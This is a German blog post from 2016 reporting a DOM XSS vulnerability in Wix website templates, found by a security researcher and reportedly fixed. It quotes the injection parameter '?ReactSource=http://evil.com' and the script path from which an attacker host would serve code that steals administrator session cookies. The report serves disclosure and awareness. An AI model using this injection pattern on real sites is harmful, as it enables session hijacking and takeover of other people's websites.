XSS-Sicherheitslücke gefährdete WIX-Sites

Publiziert am 7. November 2016 von Günter Born

Eine XSS-Sicherheitslücke in den vom Hoster Wix verwendeten Templates für Webseiten macht3 diese angreifbar für einen Wurm. Die Lücke scheint seit dem 3. November 2016 geschlossen.

Anzeige

Das Ganze wurde von Sicherheitsforscher Matt Austin in diesem Blog-Beitrag dokumentiert. Der Anbieter Wix.com hat eine veritable DOM XSS-Sicherheitslücke in seinen Seitenvorlagen, die es Angreifern ermöglicht, die Kontrolle über jede beim Anbieter gehostete Webseite zu erlangen. Dazu muss zur URL einer bei Wix.com gehosteten Seite nur der Parameter:

?ReactSource=http://evil.com

angehängt werden. Wird auf evil.com im Verzeichnis:

/packages-bin/wixCodeInit/wixCodeInit.min.js

Schadcode gehostet, kann dieses JavaScript unter der Ziel-Webseite laufen. Damit können über die XSS-Sicherheitslücke Sitzungs-Cookies des Administrators einer Wix-Subdomain gestohlen und für eigene Zwecke missbraucht werden. Matt Austin hat die Details in diesem Blog-Beitrag dokumentiert. Laut den Nachträgen im Beitrag ist die Sicherheitslücke seit dem 3. November 2016 geschlossen. (via)

Cookies blockieren entzieht uns die Finanzierung: Cookie-Einstellungen
Dieser Beitrag wurde unter Internet, Sicherheit abgelegt und mit , , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.